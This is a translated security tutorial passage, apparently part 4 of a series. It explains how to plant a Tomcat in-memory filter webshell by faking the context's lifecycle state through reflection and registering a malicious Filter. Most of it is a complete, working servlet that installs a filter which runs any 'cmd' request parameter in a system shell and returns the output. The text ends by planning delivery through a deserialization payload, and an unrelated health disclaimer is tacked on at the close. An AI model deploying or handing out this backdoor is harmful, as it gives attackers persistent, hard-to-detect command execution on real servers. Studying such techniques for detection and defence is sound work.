
Automatic echo-back in systems: what "data echo" means (Part 4)


0x03 Memory-shell construction

The earlier Tomcat memory shell only used a Servlet to add a Filter dynamically. In a real attack the shell has to be planted through a deserialization sink, so below we build a complete version.

Obtaining the ApplicationContext and calling addFilter to register the malicious Filter directly does not work:

```java
ApplicationContext.addFilter(filterName, new ShellIntInject());
```

At the breakpoint inside addFilter there is a state check: once the context has started it is no longer in LifecycleState.STARTING_PREP, so the condition is true and an IllegalStateException is thrown. The check can be bypassed by changing the lifecycle state through reflection:

```java
Field state = Class.forName("org.apache.catalina.util.LifecycleBase").getDeclaredField("state");
state.setAccessible(true);
state.set(standardContext, org.apache.catalina.LifecycleState.STARTING_PREP);
```

With the state patched, look at the rest of addFilter: this.context.findFilterDef looks the name up in the StandardContext's filterDefs and, if it is absent, creates a FilterDef and stores it there. A working filter needs entries in all three structures: filterDefs, filterMaps and filterConfigs.

So the sequence is: set the state to LifecycleState.STARTING_PREP by reflection, add the filter, then restore LifecycleState.STARTED. The restore is mandatory; otherwise the context is left in a non-started state and the service becomes unavailable.

Next add the URL mapping; this writes a FilterMap into filterMaps:

```java
// add the intercept path; the implementation stores a FilterMap in StandardContext.filterMaps
registration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false, new String[]{"/*"});
```

Then look at StandardContext.filterStart: it iterates over every filterDef, instantiates an ApplicationFilterConfig for it and puts that into filterConfigs:

```java
// decompiled excerpt of org.apache.catalina.core.StandardContext.filterStart()
public boolean filterStart() {
    boolean ok = true;
    synchronized (filterConfigs) {
        this.filterConfigs.clear();
        Iterator i$ = this.filterDefs.entrySet().iterator();
        while (i$.hasNext()) {
            Entry<String, FilterDef> entry = (Entry) i$.next();
            String name = (String) entry.getKey();
            if (this.getLogger().isDebugEnabled()) {
                this.getLogger().debug(" Starting filter '" + name + "'");
            }
            try {
                ApplicationFilterConfig filterConfig = new ApplicationFilterConfig(this, (FilterDef) entry.getValue());
                this.filterConfigs.put(name, filterConfig);
            } catch (Throwable var8) {
                Throwable t = ExceptionUtils.unwrapInvocationTargetException(var8);
                ExceptionUtils.handleThrowable(t);
                this.getLogger().error(sm.getString("standardContext.filterStart", new Object[]{name}), t);
                ok = false;
            }
        }
    }
    return ok;
}
```

Our earlier call to addFilter already put the corresponding filterDef in place, so calling filterStart is enough to get the filterConfig created. Note that filterStart clears filterConfigs first and re-instantiates and re-initialises every filter the application has, not just ours.

```java
// call filterStart so an ApplicationFilterConfig is built and stored in filterConfigs
Method filterStart = Class.forName("org.apache.catalina.core.StandardContext").getMethod("filterStart");
filterStart.setAccessible(true);
filterStart.invoke(standardContext);
```

Finally the filter's position in filterMaps is adjusted so that it runs ahead of the existing filters.

One lesson from debugging: when any of the code above threw an exception, state.set(standardContext, org.apache.catalina.LifecycleState.STARTED) was never reached and Tomcat answered every request with 503; normal access was impossible until a restart. Doing the restore in a finally block avoids this.
Full code

Two caveats on the listing: the Field.modifiers trick used to strip FINAL only works on Java 8 to 11, and the ThreadLocals in ApplicationFilterChain are still null on the first request (WRAP_SAME_OBJECT was false when that class was initialised), so the first request only arms the mechanism and the second one plants the shell.

```java
package com;

import org.apache.catalina.LifecycleState;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.EnumSet;

@WebServlet("/testServlet")
public class testServlet extends HttpServlet {
    private static final String cmdParamName = "cmd";
    private static final String filterUrlPattern = "/*";
    private static final String filterName = "cmdFilter";

    @SuppressWarnings("unchecked")
    protected void doPost(HttpServletRequest request, HttpServletResponse response) {
        try {
            // Step 1: reach the current request/response through ApplicationFilterChain's static
            // ThreadLocals. Tomcat only fills them when ApplicationDispatcher.WRAP_SAME_OBJECT is true,
            // so the flag is flipped and fresh ThreadLocals installed. All three fields are final;
            // the Field.modifiers trick removes FINAL (Java 8 to 11 only).
            Field wrap_same_object = Class.forName("org.apache.catalina.core.ApplicationDispatcher")
                    .getDeclaredField("WRAP_SAME_OBJECT");
            Field lastServicedRequest = Class.forName("org.apache.catalina.core.ApplicationFilterChain")
                    .getDeclaredField("lastServicedRequest");
            Field lastServicedResponse = Class.forName("org.apache.catalina.core.ApplicationFilterChain")
                    .getDeclaredField("lastServicedResponse");
            wrap_same_object.setAccessible(true);
            lastServicedRequest.setAccessible(true);
            lastServicedResponse.setAccessible(true);

            // strip the final modifier
            Field modifiersField = Field.class.getDeclaredField("modifiers");
            modifiersField.setAccessible(true);
            modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);
            modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);
            modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);

            ThreadLocal<ServletRequest> requestThreadLocal =
                    (ThreadLocal<ServletRequest>) lastServicedRequest.get(null);
            ThreadLocal<ServletResponse> responseThreadLocal =
                    (ThreadLocal<ServletResponse>) lastServicedResponse.get(null);
            wrap_same_object.setBoolean(null, true);
            lastServicedRequest.set(null, new ThreadLocal<>());
            lastServicedResponse.set(null, new ThreadLocal<>());

            // First request: the ThreadLocals are still null. The flag is set now, so the
            // next request finds them populated; until then there is nothing to do.
            if (requestThreadLocal == null || responseThreadLocal == null) {
                return;
            }
            ServletRequest servletRequest = requestThreadLocal.get();
            ServletResponse servletResponse = responseThreadLocal.get();
            if (servletRequest == null || servletResponse == null) {
                return;
            }
            // what we actually get here is an ApplicationContextFacade
            ServletContext servletContext = servletRequest.getServletContext();
            if (servletContext == null) {
                return;
            }

            // Step 2: the malicious Filter. Runs the "cmd" parameter through a shell and writes
            // the output straight into the response.
            class ShellIntInject implements Filter {
                @Override
                public void init(FilterConfig filterConfig) {
                }

                @Override
                public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain)
                        throws IOException, ServletException {
                    String cmd = req.getParameter(cmdParamName);
                    if (cmd != null) {
                        String[] cmds;
                        if (System.getProperty("os.name").toLowerCase().contains("win")) {
                            cmds = new String[]{"cmd.exe", "/c", cmd};
                        } else {
                            cmds = new String[]{"sh", "-c", cmd};
                        }
                        java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                        // "\\A" anchors at start of input, so the whole stream is read as one token
                        java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\A");
                        String output = s.hasNext() ? s.next() : "";
                        java.io.Writer writer = resp.getWriter();
                        writer.write(output);
                        writer.flush();
                        writer.close();
                        return; // response is complete; do not hand a closed writer down the chain
                    }
                    chain.doFilter(req, resp); // no command: behave like a normal pass-through filter
                }

                @Override
                public void destroy() {
                }
            }

            // Step 3: unwrap ApplicationContextFacade -> ApplicationContext -> StandardContext
            Field context = servletContext.getClass().getDeclaredField("context");
            context.setAccessible(true);
            ApplicationContext applicationContext = (ApplicationContext) context.get(servletContext);
            Field context1 = applicationContext.getClass().getDeclaredField("context");
            context1.setAccessible(true);
            StandardContext standardContext = (StandardContext) context1.get(applicationContext);

            // Step 4: addFilter() only accepts a context in STARTING_PREP. Fake that state, register
            // the filter, and restore STARTED in a finally block so a failure cannot leave Tomcat on 503.
            Field state = Class.forName("org.apache.catalina.util.LifecycleBase").getDeclaredField("state");
            state.setAccessible(true);
            state.set(standardContext, LifecycleState.STARTING_PREP);
            try {
                // register the filter name: creates the FilterDef in StandardContext.filterDefs
                FilterRegistration.Dynamic registration =
                        applicationContext.addFilter(filterName, new ShellIntInject());
                // add the intercept path: stores a FilterMap in StandardContext.filterMaps
                registration.addMappingForUrlPatterns(EnumSet.of(DispatcherType.REQUEST), false, filterUrlPattern);
                // call filterStart so an ApplicationFilterConfig is built and stored in filterConfigs
                Method filterStart = StandardContext.class.getMethod("filterStart");
                filterStart.setAccessible(true);
                filterStart.invoke(standardContext);
                // move our FilterMap to the front so the shell runs before any existing filter
                FilterMap[] filterMaps = standardContext.findFilterMaps();
                for (int i = 0; i < filterMaps.length; i++) {
                    if (filterMaps[i].getFilterName().equalsIgnoreCase(filterName)) {
                        FilterMap filterMap = filterMaps[i];
                        filterMaps[i] = filterMaps[0];
                        filterMaps[0] = filterMap;
                        break;
                    }
                }
                servletResponse.getWriter().write("Success");
            } finally {
                state.set(standardContext, LifecycleState.STARTED);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        this.doPost(request, response);
    }
}
```

This is not the end, though. We used code execution to obtain the Request and Response and build the memory shell, but the code still has to be reworked and integrated into yso so that it can be delivered through a deserialization attack.


以上關(guān)于本文的內(nèi)容,僅作參考!溫馨提示:如遇健康、疾病相關(guān)的問題,請您及時就醫(yī)或請專業(yè)人士給予相關(guān)指導!
